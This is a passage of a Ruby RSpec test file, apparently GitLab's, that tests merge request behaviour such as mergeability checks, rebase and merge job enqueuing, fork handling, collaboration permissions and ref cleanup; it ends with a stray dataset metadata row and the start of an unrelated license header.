describe '#participants' do
let(:project) { create(:project, :public) }
let(:mr) do
create(:merge_request, source_project: project, target_project: project)
end
let!(:note1) do
create(:note_on_merge_request, noteable: mr, project: project, note: 'a')
end
let!(:note2) do
create(:note_on_merge_request, noteable: mr, project: project, note: 'b')
end
it 'includes the merge request author' do
expect(mr.participants).to include(mr.author)
end
it 'includes the authors of the notes' do
expect(mr.participants).to include(note1.author, note2.author)
end
end
describe 'cached counts' do
it 'updates when assignees change' do
user1 = create(:user)
user2 = create(:user)
mr = create(:merge_request, assignees: [user1])
mr.project.add_developer(user1)
mr.project.add_developer(user2)
expect(user1.assigned_open_merge_requests_count).to eq(1)
expect(user2.assigned_open_merge_requests_count).to eq(0)
mr.assignees = [user2]
expect(user1.assigned_open_merge_requests_count).to eq(0)
expect(user2.assigned_open_merge_requests_count).to eq(1)
end
end
describe '#merge_async' do
it 'enqueues MergeWorker job and updates merge_jid' do
merge_request = create(:merge_request)
user_id = double(:user_id)
params = {}
merge_jid = 'hash-123'
expect(merge_request).to receive(:expire_etag_cache)
expect(MergeWorker).to receive(:perform_async).with(merge_request.id, user_id, params) do
merge_jid
end
merge_request.merge_async(user_id, params)
expect(merge_request.reload.merge_jid).to eq(merge_jid)
end
end
describe '#rebase_async' do
let(:merge_request) { create(:merge_request) }
let(:user_id) { double(:user_id) }
let(:rebase_jid) { 'rebase-jid' }
subject(:execute) { merge_request.rebase_async(user_id) }
it 'atomically enqueues a RebaseWorker job and updates rebase_jid' do
expect(RebaseWorker)
.to receive(:perform_async)
.with(merge_request.id, user_id)
.and_return(rebase_jid)
expect(merge_request).to receive(:expire_etag_cache)
expect(merge_request).to receive(:lock!).and_call_original
execute
expect(merge_request.rebase_jid).to eq(rebase_jid)
end
it 'refuses to enqueue a job if a rebase is in progress' do
merge_request.update_column(:rebase_jid, rebase_jid)
expect(RebaseWorker).not_to receive(:perform_async)
expect(Gitlab::SidekiqStatus)
.to receive(:running?)
.with(rebase_jid)
.and_return(true)
expect { execute }.to raise_error(ActiveRecord::StaleObjectError)
end
it 'refuses to enqueue a job if the MR is not open' do
merge_request.update_column(:state, 'foo')
expect(RebaseWorker).not_to receive(:perform_async)
expect { execute }.to raise_error(ActiveRecord::StaleObjectError)
end
end
describe '#mergeable?' do
let(:project) { create(:project) }
subject { create(:merge_request, source_project: project) }
it 'returns false if #mergeable_state? is false' do
expect(subject).to receive(:mergeable_state?) { false }
expect(subject.mergeable?).to be_falsey
end
it 'returns true if #mergeable_state? is true and the MR #can_be_merged? is true' do
allow(subject).to receive(:mergeable_state?) { true }
expect(subject).to receive(:check_mergeability)
expect(subject).to receive(:can_be_merged?) { true }
expect(subject.mergeable?).to be_truthy
end
end
describe '#mergeable_state?' do
let(:project) { create(:project, :repository) }
subject { create(:merge_request, source_project: project) }
it 'checks if merge request can be merged' do
allow(subject).to receive(:mergeable_ci_state?) { true }
expect(subject).to receive(:check_mergeability)
subject.mergeable?
end
context 'when not open' do
before do
subject.close
end
it 'returns false' do
expect(subject.mergeable_state?).to be_falsey
end
end
context 'when marked as work in progress' do
before do
subject.title = 'WIP MR'
end
it 'returns false' do
expect(subject.mergeable_state?).to be_falsey
end
end
context 'when broken' do
before do
allow(subject).to receive(:broken?) { true }
end
it 'returns false' do
expect(subject.mergeable_state?).to be_falsey
end
end
context 'when checks fail' do
context 'when #mergeable_ci_state? is false' do
before do
allow(subject).to receive(:mergeable_ci_state?) { false }
end
it 'returns false' do
expect(subject.mergeable_state?).to be_falsey
end
end
context 'when #mergeable_discussions_state? is false' do
before do
allow(subject).to receive(:mergeable_discussions_state?) { false }
end
it 'returns false' do
expect(subject.mergeable_state?).to be_falsey
end
it 'returns true when skipping discussions check' do
expect(subject.mergeable_state?(skip_discussions_check: true)).to be(true)
end
end
end
end
describe '#mergeable_ci_state?' do
let(:project) { create(:project, only_allow_merge_if_pipeline_succeeds: true) }
let(:pipeline) { create(:ci_empty_pipeline) }
subject { build(:merge_request, target_project: project) }
context 'when it is only allowed to merge when build is green' do
context 'and a failed pipeline is associated' do
before do
pipeline.update(status: 'failed', sha: subject.diff_head_sha)
allow(subject).to receive(:head_pipeline) { pipeline }
end
it { expect(subject.mergeable_ci_state?).to be_falsey }
end
context 'and a successful pipeline is associated' do
before do
pipeline.update(status: 'success', sha: subject.diff_head_sha)
allow(subject).to receive(:head_pipeline) { pipeline }
end
it { expect(subject.mergeable_ci_state?).to be_truthy }
end
context 'and a skipped pipeline is associated' do
before do
pipeline.update(status: 'skipped', sha: subject.diff_head_sha)
allow(subject).to receive(:head_pipeline) { pipeline }
end
it { expect(subject.mergeable_ci_state?).to be_truthy }
end
context 'when no pipeline is associated' do
before do
allow(subject).to receive(:head_pipeline) { nil }
end
it { expect(subject.mergeable_ci_state?).to be_falsey }
end
end
context 'when merges are not restricted to green builds' do
subject { build(:merge_request, target_project: create(:project, only_allow_merge_if_pipeline_succeeds: false)) }
context 'and a failed pipeline is associated' do
before do
pipeline.statuses << create(:commit_status, status: 'failed', project: project)
allow(subject).to receive(:head_pipeline) { pipeline }
end
it { expect(subject.mergeable_ci_state?).to be_truthy }
end
context 'when no pipeline is associated' do
before do
allow(subject).to receive(:head_pipeline) { nil }
end
it { expect(subject.mergeable_ci_state?).to be_truthy }
end
end
end
describe '#mergeable_discussions_state?' do
let(:merge_request) { create(:merge_request_with_diff_notes, source_project: project) }
context 'when project.only_allow_merge_if_all_discussions_are_resolved == true' do
let(:project) { create(:project, :repository, only_allow_merge_if_all_discussions_are_resolved: true) }
context 'with all discussions resolved' do
before do
merge_request.discussions.each { |d| d.resolve!(merge_request.author) }
end
it 'returns true' do
expect(merge_request.mergeable_discussions_state?).to be_truthy
end
end
context 'with unresolved discussions' do
before do
merge_request.discussions.each(&:unresolve!)
end
it 'returns false' do
expect(merge_request.mergeable_discussions_state?).to be_falsey
end
end
context 'with no discussions' do
before do
merge_request.notes.destroy_all # rubocop: disable DestroyAll
end
it 'returns true' do
expect(merge_request.mergeable_discussions_state?).to be_truthy
end
end
end
context 'when project.only_allow_merge_if_all_discussions_are_resolved == false' do
let(:project) { create(:project, :repository, only_allow_merge_if_all_discussions_are_resolved: false) }
context 'with unresolved discussions' do
before do
merge_request.discussions.each(&:unresolve!)
end
it 'returns true' do
expect(merge_request.mergeable_discussions_state?).to be_truthy
end
end
end
end
describe "#environments_for" do
let(:project) { create(:project, :repository) }
let(:user) { project.creator }
let(:merge_request) { create(:merge_request, source_project: project) }
before do
merge_request.source_project.add_maintainer(user)
merge_request.target_project.add_maintainer(user)
end
context 'with multiple environments' do
let(:environments) { create_list(:environment, 3, project: project) }
before do
create(:deployment, :success, environment: environments.first, ref: 'master', sha: project.commit('master').id)
create(:deployment, :success, environment: environments.second, ref: 'feature', sha: project.commit('feature').id)
end
it 'selects deployed environments' do
expect(merge_request.environments_for(user)).to contain_exactly(environments.first)
end
end
context 'with environments on source project' do
let(:source_project) { fork_project(project, nil, repository: true) }
let(:merge_request) do
create(:merge_request,
source_project: source_project, source_branch: 'feature',
target_project: project)
end
let(:source_environment) { create(:environment, project: source_project) }
before do
create(:deployment, :success, environment: source_environment, ref: 'feature', sha: merge_request.diff_head_sha)
end
it 'selects deployed environments' do
expect(merge_request.environments_for(user)).to contain_exactly(source_environment)
end
context 'with environments on target project' do
let(:target_environment) { create(:environment, project: project) }
before do
create(:deployment, :success, environment: target_environment, tag: true, sha: merge_request.diff_head_sha)
end
it 'selects deployed environments' do
expect(merge_request.environments_for(user)).to contain_exactly(source_environment, target_environment)
end
end
end
context 'without a diff_head_commit' do
before do
expect(merge_request).to receive(:diff_head_commit).and_return(nil)
end
it 'returns an empty array' do
expect(merge_request.environments_for(user)).to be_empty
end
end
end
describe "#environments" do
subject { merge_request.environments }
let(:merge_request) { create(:merge_request, source_branch: 'feature', target_branch: 'master') }
let(:project) { merge_request.project }
let(:pipeline) do
create(:ci_pipeline,
source: :merge_request_event,
merge_request: merge_request, project: project,
sha: merge_request.diff_head_sha,
merge_requests_as_head_pipeline: [merge_request])
end
let!(:job) { create(:ci_build, :start_review_app, pipeline: pipeline, project: project) }
it 'returns environments' do
is_expected.to eq(pipeline.environments)
expect(subject.count).to be(1)
end
context 'when pipeline is not associated with environments' do
let!(:job) { create(:ci_build, pipeline: pipeline, project: project) }
it 'returns empty array' do
is_expected.to be_empty
end
end
context 'when pipeline is not a pipeline for merge request' do
let(:pipeline) do
create(:ci_pipeline,
project: project,
ref: 'feature',
sha: merge_request.diff_head_sha,
merge_requests_as_head_pipeline: [merge_request])
end
it 'returns empty relation' do
is_expected.to be_empty
end
end
end
describe "#reload_diff" do
it 'calls MergeRequests::ReloadDiffsService#execute with correct params' do
user = create(:user)
service = instance_double(MergeRequests::ReloadDiffsService, execute: nil)
expect(MergeRequests::ReloadDiffsService)
.to receive(:new).with(subject, user)
.and_return(service)
subject.reload_diff(user)
expect(service).to have_received(:execute)
end
context 'when using the after_update hook to update' do
context 'when the branches are updated' do
it 'uses the new heads to generate the diff' do
expect { subject.update!(source_branch: subject.target_branch, target_branch: subject.source_branch) }
.to change { subject.merge_request_diff.start_commit_sha }
.and change { subject.merge_request_diff.head_commit_sha }
end
end
end
end
describe '#update_diff_discussion_positions' do
let(:discussion) { create(:diff_note_on_merge_request, project: subject.project, noteable: subject).to_discussion }
let(:commit) { subject.project.commit(sample_commit.id) }
let(:old_diff_refs) { subject.diff_refs }
before do
# Update merge_request_diff so that #diff_refs will return commit.diff_refs
allow(subject).to receive(:create_merge_request_diff) do
subject.merge_request_diffs.create(
base_commit_sha: commit.parent_id,
start_commit_sha: commit.parent_id,
head_commit_sha: commit.sha
)
subject.reload_merge_request_diff
end
end
it "updates diff discussion positions" do
expect(Discussions::UpdateDiffPositionService).to receive(:new).with(
subject.project,
subject.author,
old_diff_refs: old_diff_refs,
new_diff_refs: commit.diff_refs,
paths: discussion.position.paths
).and_call_original
expect_any_instance_of(Discussions::UpdateDiffPositionService).to receive(:execute).with(discussion).and_call_original
expect_any_instance_of(DiffNote).to receive(:save).once
subject.update_diff_discussion_positions(old_diff_refs: old_diff_refs,
new_diff_refs: commit.diff_refs,
current_user: subject.author)
end
context 'when resolve_outdated_diff_discussions is set' do
before do
discussion
subject.project.update!(resolve_outdated_diff_discussions: true)
end
it 'calls MergeRequests::ResolvedDiscussionNotificationService' do
expect_any_instance_of(MergeRequests::ResolvedDiscussionNotificationService)
.to receive(:execute).with(subject)
subject.update_diff_discussion_positions(old_diff_refs: old_diff_refs,
new_diff_refs: commit.diff_refs,
current_user: subject.author)
end
end
end
describe '#branch_merge_base_commit' do
context 'source and target branch exist' do
it { expect(subject.branch_merge_base_commit.sha).to eq('ae73cb07c9eeaf35924a10f713b364d32b2dd34f') }
it { expect(subject.branch_merge_base_commit).to be_a(Commit) }
end
context 'when the target branch does not exist' do
before do
subject.project.repository.rm_branch(subject.author, subject.target_branch)
subject.clear_memoized_shas
end
it 'returns nil' do
expect(subject.branch_merge_base_commit).to be_nil
end
end
end
describe "#diff_refs" do
context "with diffs" do
subject { create(:merge_request, :with_diffs) }
let(:expected_diff_refs) do
Gitlab::Diff::DiffRefs.new(
base_sha: subject.merge_request_diff.base_commit_sha,
start_sha: subject.merge_request_diff.start_commit_sha,
head_sha: subject.merge_request_diff.head_commit_sha
)
end
it "does not touch the repository" do
subject # Instantiate the object
expect_any_instance_of(Repository).not_to receive(:commit)
subject.diff_refs
end
it "returns expected diff_refs" do
expect(subject.diff_refs).to eq(expected_diff_refs)
end
context 'when importing' do
before do
subject.importing = true
end
it "returns MR diff_refs" do
expect(subject.diff_refs).to eq(expected_diff_refs)
end
end
end
end
describe "#source_project_missing?" do
let(:project) { create(:project) }
let(:forked_project) { fork_project(project) }
let(:user) { create(:user) }
let(:unlink_project) { Projects::UnlinkForkService.new(forked_project, user) }
context "when the fork exists" do
let(:merge_request) do
create(:merge_request,
source_project: forked_project,
target_project: project)
end
it { expect(merge_request.source_project_missing?).to be_falsey }
end
context "when the source project is the same as the target project" do
let(:merge_request) { create(:merge_request, source_project: project) }
it { expect(merge_request.source_project_missing?).to be_falsey }
end
context "when the fork does not exist" do
let!(:merge_request) do
create(:merge_request,
source_project: forked_project,
target_project: project)
end
it "returns true" do
unlink_project.execute
merge_request.reload
expect(merge_request.source_project_missing?).to be_truthy
end
end
end
describe '#merge_ongoing?' do
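# merge_ongoing? should be true only while a merge is actually happening:
# either the MR is locked, or merge_jid points at a Sidekiq job that is
# still reported as running.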
it 'returns true when the merge request is locked' do
merge_request = build_stubbed(:merge_request, state: :locked)
expect(merge_request.merge_ongoing?).to be(true)
end
it 'returns true when merge_jid is present, the MR is not merged and the merge job is running' do
merge_request = build_stubbed(:merge_request, state: :open, merge_jid: 'foo')
allow(Gitlab::SidekiqStatus).to receive(:running?).with('foo') { true }
expect(merge_request.merge_ongoing?).to be(true)
end
it 'returns false when merge_jid is nil' do
merge_request = build_stubbed(:merge_request, state: :open, merge_jid: nil)
expect(merge_request.merge_ongoing?).to be(false)
end
it 'returns false if MR is merged' do
merge_request = build_stubbed(:merge_request, state: :merged, merge_jid: 'foo')
expect(merge_request.merge_ongoing?).to be(false)
end
it 'returns false if there is no merge job running' do
merge_request = build_stubbed(:merge_request, state: :open, merge_jid: 'foo')
allow(Gitlab::SidekiqStatus).to receive(:running?).with('foo') { false }
expect(merge_request.merge_ongoing?).to be(false)
end
end
describe "#closed_without_fork?" do
let(:project) { create(:project) }
let(:forked_project) { fork_project(project) }
let(:user) { create(:user) }
let(:unlink_project) { Projects::UnlinkForkService.new(forked_project, user) }
context "when the merge request is closed" do
let(:closed_merge_request) do
create(:closed_merge_request,
source_project: forked_project,
target_project: project)
end
it "returns false if the fork exist" do
expect(closed_merge_request.closed_without_fork?).to be_falsey
end
it "returns true if the fork does not exist" do
unlink_project.execute
closed_merge_request.reload
expect(closed_merge_request.closed_without_fork?).to be_truthy
end
end
context "when the merge request is open" do
let(:open_merge_request) do
create(:merge_request,
source_project: forked_project,
target_project: project)
end
it "returns false" do
expect(open_merge_request.closed_without_fork?).to be_falsey
end
end
end
describe '#reopenable?' do
context 'when the merge request is closed' do
it 'returns true' do
subject.close
expect(subject.reopenable?).to be_truthy
end
context 'forked project' do
let(:project) { create(:project, :public) }
let(:user) { create(:user) }
let(:forked_project) { fork_project(project, user) }
let!(:merge_request) do
create(:closed_merge_request,
source_project: forked_project,
target_project: project)
end
it 'returns false if unforked' do
Projects::UnlinkForkService.new(forked_project, user).execute
expect(merge_request.reload.reopenable?).to be_falsey
end
it 'returns false if the source project is deleted' do
Projects::DestroyService.new(forked_project, user).execute
expect(merge_request.reload.reopenable?).to be_falsey
end
it 'returns false if the merge request is merged' do
merge_request.update(state: 'merged')
expect(merge_request.reload.reopenable?).to be_falsey
end
end
end
context 'when the merge request is opened' do
it 'returns false' do
expect(subject.reopenable?).to be_falsey
end
end
end
describe '#mergeable_with_quick_action?' do
def create_pipeline(status)
pipeline = create(:ci_pipeline_with_one_job,
project: project,
ref: merge_request.source_branch,
sha: merge_request.diff_head_sha,
status: status,
head_pipeline_of: merge_request)
pipeline
end
let(:project) { create(:project, :public, :repository, only_allow_merge_if_pipeline_succeeds: true) }
let(:developer) { create(:user) }
let(:user) { create(:user) }
let(:merge_request) { create(:merge_request, source_project: project) }
let(:mr_sha) { merge_request.diff_head_sha }
before do
project.add_developer(developer)
end
context 'when autocomplete_precheck is set to true' do
it 'is mergeable by developer' do
expect(merge_request.mergeable_with_quick_action?(developer, autocomplete_precheck: true)).to be_truthy
end
it 'is not mergeable by normal user' do
expect(merge_request.mergeable_with_quick_action?(user, autocomplete_precheck: true)).to be_falsey
end
end
context 'when autocomplete_precheck is set to false' do
it 'is mergeable by developer' do
expect(merge_request.mergeable_with_quick_action?(developer, last_diff_sha: mr_sha)).to be_truthy
end
it 'is not mergeable by normal user' do
expect(merge_request.mergeable_with_quick_action?(user, last_diff_sha: mr_sha)).to be_falsey
end
context 'closed MR' do
before do
merge_request.update_attribute(:state, :closed)
end
it 'is not mergeable' do
expect(merge_request.mergeable_with_quick_action?(developer, last_diff_sha: mr_sha)).to be_falsey
end
end
context 'MR with WIP' do
before do
merge_request.update_attribute(:title, 'WIP: some MR')
end
it 'is not mergeable' do
expect(merge_request.mergeable_with_quick_action?(developer, last_diff_sha: mr_sha)).to be_falsey
end
end
context 'sha differs from the MR diff_head_sha' do
it 'is not mergeable' do
expect(merge_request.mergeable_with_quick_action?(developer, last_diff_sha: 'some other sha')).to be_falsey
end
end
context 'sha is not provided' do
it 'is not mergeable' do
expect(merge_request.mergeable_with_quick_action?(developer)).to be_falsey
end
end
context 'with pipeline ok' do
before do
create_pipeline(:success)
end
it 'is mergeable' do
expect(merge_request.mergeable_with_quick_action?(developer, last_diff_sha: mr_sha)).to be_truthy
end
end
context 'with failing pipeline' do
before do
create_pipeline(:failed)
end
it 'is not mergeable' do
expect(merge_request.mergeable_with_quick_action?(developer, last_diff_sha: mr_sha)).to be_falsey
end
end
context 'with running pipeline' do
before do
create_pipeline(:running)
end
it 'is mergeable' do
expect(merge_request.mergeable_with_quick_action?(developer, last_diff_sha: mr_sha)).to be_truthy
end
end
end
end
describe '#base_pipeline' do
let(:pipeline_arguments) do
{
project: project,
ref: merge_request.target_branch,
sha: merge_request.diff_base_sha
}
end
let(:project) { create(:project, :public, :repository) }
let(:merge_request) { create(:merge_request, source_project: project) }
let!(:first_pipeline) { create(:ci_pipeline_without_jobs, pipeline_arguments) }
let!(:last_pipeline) { create(:ci_pipeline_without_jobs, pipeline_arguments) }
let!(:last_pipeline_with_other_ref) { create(:ci_pipeline_without_jobs, pipeline_arguments.merge(ref: 'other')) }
it 'returns latest pipeline for the target branch' do
expect(merge_request.base_pipeline).to eq(last_pipeline)
end
end
describe '#has_commits?' do
it 'returns true when merge request diff has commits' do
allow(subject.merge_request_diff).to receive(:commits_count)
.and_return(2)
expect(subject.has_commits?).to be_truthy
end
context 'when commits_count is nil' do
it 'returns false' do
allow(subject.merge_request_diff).to receive(:commits_count)
.and_return(nil)
expect(subject.has_commits?).to be_falsey
end
end
end
describe '#has_no_commits?' do
before do
allow(subject.merge_request_diff).to receive(:commits_count)
.and_return(0)
end
it 'returns true when merge request diff has 0 commits' do
expect(subject.has_no_commits?).to be_truthy
end
end
describe '#merge_request_diff_for' do
subject { create(:merge_request, importing: true) }
let!(:merge_request_diff1) { subject.merge_request_diffs.create(head_commit_sha: '6f6d7e7ed97bb5f0054f2b1df789b39ca89b6ff9') }
let!(:merge_request_diff2) { subject.merge_request_diffs.create(head_commit_sha: nil) }
let!(:merge_request_diff3) { subject.merge_request_diffs.create(head_commit_sha: '5937ac0a7beb003549fc5fd26fc247adbce4a52e') }
context 'with diff refs' do
it 'returns the diffs' do
expect(subject.merge_request_diff_for(merge_request_diff1.diff_refs)).to eq(merge_request_diff1)
end
end
context 'with a commit SHA' do
it 'returns the diffs' do
expect(subject.merge_request_diff_for(merge_request_diff3.head_commit_sha)).to eq(merge_request_diff3)
end
end
it 'runs a single query on the initial call, and none afterwards' do
expect { subject.merge_request_diff_for(merge_request_diff1.diff_refs) }
.not_to exceed_query_limit(1)
expect { subject.merge_request_diff_for(merge_request_diff2.diff_refs) }
.not_to exceed_query_limit(0)
expect { subject.merge_request_diff_for(merge_request_diff3.head_commit_sha) }
.not_to exceed_query_limit(0)
end
end
describe '#version_params_for' do
subject { create(:merge_request, importing: true) }
let(:project) { subject.project }
let!(:merge_request_diff1) { subject.merge_request_diffs.create(head_commit_sha: '6f6d7e7ed97bb5f0054f2b1df789b39ca89b6ff9') }
let!(:merge_request_diff2) { subject.merge_request_diffs.create(head_commit_sha: nil) }
let!(:merge_request_diff3) { subject.merge_request_diffs.create(head_commit_sha: '5937ac0a7beb003549fc5fd26fc247adbce4a52e') }
context 'when the diff refs are for an older merge request version' do
let(:diff_refs) { merge_request_diff1.diff_refs }
it 'returns the diff ID for the version to show' do
expect(subject.version_params_for(diff_refs)).to eq(diff_id: merge_request_diff1.id)
end
end
context 'when the diff refs are for a comparison between merge request versions' do
let(:diff_refs) { merge_request_diff3.compare_with(merge_request_diff1.head_commit_sha).diff_refs }
it 'returns the diff ID and start sha of the versions to compare' do
expect(subject.version_params_for(diff_refs)).to eq(diff_id: merge_request_diff3.id, start_sha: merge_request_diff1.head_commit_sha)
end
end
context 'when the diff refs are not for a merge request version' do
let(:diff_refs) { project.commit(sample_commit.id).diff_refs }
it 'returns nil' do
expect(subject.version_params_for(diff_refs)).to be_nil
end
end
end
describe '#fetch_ref!' do
it 'fetches the ref correctly' do
expect { subject.target_project.repository.delete_refs(subject.ref_path) }.not_to raise_error
subject.fetch_ref!
expect(subject.target_project.repository.ref_exists?(subject.ref_path)).to be_truthy
end
end
describe 'removing a merge request' do
it 'refreshes the number of open merge requests of the target project' do
project = subject.target_project
expect { subject.destroy }
.to change { project.open_merge_requests_count }.from(1).to(0)
end
end
it_behaves_like 'throttled touch' do
subject { create(:merge_request, updated_at: 1.hour.ago) }
end
context 'state machine transitions' do
describe '#unlock_mr' do
subject { create(:merge_request, state: 'locked', merge_jid: 123) }
it 'updates merge request head pipeline and sets merge_jid to nil' do
pipeline = create(:ci_empty_pipeline, project: subject.project, ref: subject.source_branch, sha: subject.source_branch_sha)
subject.unlock_mr
subject.reload
expect(subject.head_pipeline).to eq(pipeline)
expect(subject.merge_jid).to be_nil
end
end
describe 'transition to cannot_be_merged' do
let(:notification_service) { double(:notification_service) }
let(:todo_service) { double(:todo_service) }
subject { create(:merge_request, state, merge_status: :unchecked) }
before do
allow(NotificationService).to receive(:new).and_return(notification_service)
allow(TodoService).to receive(:new).and_return(todo_service)
allow(subject.project.repository).to receive(:can_be_merged?).and_return(false)
end
[:opened, :locked].each do |state|
context state do
let(:state) { state }
it 'notifies conflict, but does not notify again if rechecking still results in cannot_be_merged' do
expect(notification_service).to receive(:merge_request_unmergeable).with(subject).once
expect(todo_service).to receive(:merge_request_became_unmergeable).with(subject).once
subject.mark_as_unmergeable
subject.mark_as_unchecked
subject.mark_as_unmergeable
end
it 'notifies conflict, whenever newly unmergeable' do
expect(notification_service).to receive(:merge_request_unmergeable).with(subject).twice
expect(todo_service).to receive(:merge_request_became_unmergeable).with(subject).twice
subject.mark_as_unmergeable
subject.mark_as_unchecked
subject.mark_as_mergeable
subject.mark_as_unchecked
subject.mark_as_unmergeable
end
it 'does not notify whenever merge request is newly unmergeable due to other reasons' do
allow(subject.project.repository).to receive(:can_be_merged?).and_return(true)
expect(notification_service).not_to receive(:merge_request_unmergeable)
expect(todo_service).not_to receive(:merge_request_became_unmergeable)
subject.mark_as_unmergeable
end
end
end
[:closed, :merged].each do |state|
let(:state) { state }
context state do
it 'does not notify' do
expect(notification_service).not_to receive(:merge_request_unmergeable)
expect(todo_service).not_to receive(:merge_request_became_unmergeable)
subject.mark_as_unmergeable
end
end
end
context 'source branch is missing' do
subject { create(:merge_request, :invalid, :opened, merge_status: :unchecked, target_branch: 'master') }
before do
allow(subject.project.repository).to receive(:can_be_merged?).and_call_original
end
it 'does not raise error' do
expect(notification_service).not_to receive(:merge_request_unmergeable)
expect(todo_service).not_to receive(:merge_request_became_unmergeable)
expect { subject.mark_as_unmergeable }.not_to raise_error
expect(subject.cannot_be_merged?).to eq(true)
end
end
end
describe 'check_state?' do
it 'indicates whether MR is still checking for mergeability' do
state_machine = described_class.state_machines[:merge_status]
check_states = [:unchecked, :cannot_be_merged_recheck]
check_states.each do |merge_status|
expect(state_machine.check_state?(merge_status)).to be true
end
(state_machine.states.map(&:name) - check_states).each do |merge_status|
expect(state_machine.check_state?(merge_status)).to be false
end
end
end
end
describe '#should_be_rebased?' do
let(:project) { create(:project, :repository) }
it 'returns false for the same source and target branches' do
merge_request = create(:merge_request, source_project: project, target_project: project)
expect(merge_request.should_be_rebased?).to be_falsey
end
end
describe '#rebase_in_progress?' do
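# Truth table: a rebase counts as in progress only when rebase_jid is
# present and Sidekiq still reports that job as running.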
where(:rebase_jid, :jid_valid, :result) do
'foo' | true | true
'foo' | false | false
'' | true | false
nil | true | false
end
with_them do
let(:merge_request) { create(:merge_request) }
subject { merge_request.rebase_in_progress? }
it do
allow(Gitlab::SidekiqStatus).to receive(:running?).with(rebase_jid) { jid_valid }
merge_request.rebase_jid = rebase_jid
is_expected.to eq(result)
end
end
end
describe '#allow_collaboration' do
let(:merge_request) do
build(:merge_request, source_branch: 'fixes', allow_collaboration: true)
end
it 'is false when pushing by a maintainer is not possible' do
expect(merge_request).to receive(:collaborative_push_possible?) { false }
expect(merge_request.allow_collaboration).to be_falsy
end
it 'is true when pushing by a maintainer is possible' do
expect(merge_request).to receive(:collaborative_push_possible?) { true }
expect(merge_request.allow_collaboration).to be_truthy
end
end
describe '#collaborative_push_possible?' do
let(:merge_request) do
build(:merge_request, source_branch: 'fixes')
end
before do
allow(ProtectedBranch).to receive(:protected?) { false }
end
it 'does not allow maintainer to push if the source project is the same as the target' do
merge_request.target_project = merge_request.source_project = create(:project, :public)
expect(merge_request.collaborative_push_possible?).to be_falsy
end
it 'allows maintainer to push when both source and target are public' do
merge_request.target_project = build(:project, :public)
merge_request.source_project = build(:project, :public)
expect(merge_request.collaborative_push_possible?).to be_truthy
end
it 'is not available for protected branches' do
merge_request.target_project = build(:project, :public)
merge_request.source_project = build(:project, :public)
expect(ProtectedBranch).to receive(:protected?)
.with(merge_request.source_project, 'fixes')
.and_return(true)
expect(merge_request.collaborative_push_possible?).to be_falsy
end
end
describe '#includes_any_commits?' do
it 'returns false for an empty list of commit SHAs' do
expect(subject.includes_any_commits?([])).to be_falsey
end
it 'returns false when only the blank SHA is given' do
expect(subject.includes_any_commits?([Gitlab::Git::BLANK_SHA])).to be_falsey
end
it 'returns true when the diff head SHA is given' do
expect(subject.includes_any_commits?([subject.merge_request_diff.head_commit_sha])).to be_truthy
end
it 'returns true even when there is a non-existent commit' do
expect(subject.includes_any_commits?([Gitlab::Git::BLANK_SHA, subject.merge_request_diff.head_commit_sha])).to be_truthy
end
context 'unpersisted merge request' do
let(:new_mr) { build(:merge_request) }
it 'returns false when only the blank SHA is given' do
expect(new_mr.includes_any_commits?([Gitlab::Git::BLANK_SHA])).to be_falsey
end
it 'returns true when the diff head SHA is given' do
expect(new_mr.includes_any_commits?([subject.merge_request_diff.head_commit_sha])).to be_truthy
end
end
end
describe '#can_allow_collaboration?' do
let(:target_project) { create(:project, :public) }
let(:source_project) { fork_project(target_project) }
let(:merge_request) do
create(:merge_request,
source_project: source_project,
source_branch: 'fixes',
target_project: target_project)
end
let(:user) { create(:user) }
before do
allow(merge_request).to receive(:collaborative_push_possible?) { true }
end
it 'is false if the user does not have push access to the source project' do
expect(merge_request.can_allow_collaboration?(user)).to be_falsy
end
it 'is true when the user has push access to the source project' do
source_project.add_developer(user)
expect(merge_request.can_allow_collaboration?(user)).to be_truthy
end
end
describe '#merge_participants' do
it 'contains author' do
expect(subject.merge_participants).to eq([subject.author])
end
describe 'when merge_when_pipeline_succeeds? is true' do
describe 'when merge user is author' do
let(:user) { create(:user) }
subject do
create(:merge_request,
merge_when_pipeline_succeeds: true,
merge_user: user,
author: user)
end
it 'contains author only' do
expect(subject.merge_participants).to eq([subject.author])
end
end
describe 'when merge user and author are different users' do
let(:merge_user) { create(:user) }
subject do
create(:merge_request,
merge_when_pipeline_succeeds: true,
merge_user: merge_user)
end
it 'contains author and merge user' do
expect(subject.merge_participants).to eq([subject.author, merge_user])
end
end
end
end
describe '.merge_request_ref?' do
subject { described_class.merge_request_ref?(ref) }
context 'when ref is ref name of a branch' do
let(:ref) { 'feature' }
it { is_expected.to be_falsey }
end
context 'when ref is HEAD ref path of a branch' do
let(:ref) { 'refs/heads/feature' }
it { is_expected.to be_falsey }
end
context 'when ref is HEAD ref path of a merge request' do
let(:ref) { 'refs/merge-requests/1/head' }
it { is_expected.to be_truthy }
end
context 'when ref is merge ref path of a merge request' do
let(:ref) { 'refs/merge-requests/1/merge' }
it { is_expected.to be_truthy }
end
end
describe '.merge_train_ref?' do
subject { described_class.merge_train_ref?(ref) }
context 'when ref is ref name of a branch' do
let(:ref) { 'feature' }
it { is_expected.to be_falsey }
end
context 'when ref is HEAD ref path of a branch' do
let(:ref) { 'refs/heads/feature' }
it { is_expected.to be_falsey }
end
context 'when ref is HEAD ref path of a merge request' do
let(:ref) { 'refs/merge-requests/1/head' }
it { is_expected.to be_falsey }
end
context 'when ref is merge ref path of a merge request' do
let(:ref) { 'refs/merge-requests/1/merge' }
it { is_expected.to be_falsey }
end
context 'when ref is train ref path of a merge request' do
let(:ref) { 'refs/merge-requests/1/train' }
it { is_expected.to be_truthy }
end
end
describe '#cleanup_refs' do
subject { merge_request.cleanup_refs(only: only) }
let(:merge_request) { build(:merge_request) }
context 'when removing all refs' do
let(:only) { :all }
it 'deletes all refs from the target project' do
expect(merge_request.target_project.repository)
.to receive(:delete_refs)
.with(merge_request.ref_path, merge_request.merge_ref_path, merge_request.train_ref_path)
subject
end
end
context 'when removing only train ref' do
let(:only) { :train }
it 'deletes train ref from the target project' do
expect(merge_request.target_project.repository)
.to receive(:delete_refs)
.with(merge_request.train_ref_path)
subject
end
end
end
end
| 32.490803 | 145 | 0.667113 |
286aa2478d71e99ba39ecf8c68fb0bb54ede11ff | 22,191 | # frozen_string_literal: true
# Copyright (c) 2017-2018 THL A29 Limited, a Tencent company. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
